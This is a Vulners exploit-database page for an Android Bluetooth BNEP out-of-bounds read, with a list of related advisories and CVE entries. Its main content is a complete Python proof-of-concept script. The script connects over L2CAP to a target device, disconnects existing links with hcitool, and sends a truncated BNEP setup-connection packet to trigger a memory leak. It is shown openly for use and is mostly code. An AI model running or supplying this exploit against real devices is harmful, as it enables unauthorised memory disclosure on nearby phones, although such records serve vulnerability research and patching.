Vulners
Lucene search
Android Bluetooth BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-Of-Bounds Read
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit | 23 Mar 201800:00 | – | zdt |
| Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit | 23 Mar 201800:00 | – | zdt |
 | Android Security Bulletin—March 2018Stay organized with collectionsSave and categorize content based on your preferences. | 5 Mar 201800:00 | – | androidsecurity |
 | Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06622) | 7 Mar 201800:00 | – | cnvd |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06624) | 7 Mar 201800:00 | – | cnvd |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06625) | 7 Mar 201800:00 | – | cnvd |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06626) | 7 Mar 201800:00 | – | cnvd |
 | CVE-2017-13258 | 4 Apr 201817:00 | – | cve |
| CVE-2017-13260 | 4 Apr 201817:00 | – | cve |
| CVE-2017-13261 | 4 Apr 201817:00 | – | cve |
10
`import os
import sys
import struct
import bluetooth
BNEP_PSM = 15
BNEP_FRAME_CONTROL = 0x01
# Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
def oob_read(src_bdaddr, dst):
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.settimeout(5)
bnep.bind((src_bdaddr, 0))
print 'Connecting to BNEP...'
bnep.connect((dst, BNEP_PSM))
bnep.settimeout(1)
print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..."
# This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
# plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
# It doesn't include the 'len' field, therefore it is read from out of bounds
bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
try:
data = bnep.recv(3)
except bluetooth.btcommon.BluetoothError:
data = ''
if data:
print '%r' % data
else:
print '[No data]'
print 'Closing connection.'
bnep.close()
def main(src_hci, dst):
os.system('hciconfig %s sspmode 0' % (src_hci,))
os.system('hcitool dc %s' % (dst,))
oob_read(src_hci, dst)
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
else:
if os.getuid():
print 'Error: This script must be run as root.'
else:
main(sys.argv[1], sys.argv[2])
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2018 00:00Current
7High risk
Vulners AI Score7
EPSS0.33566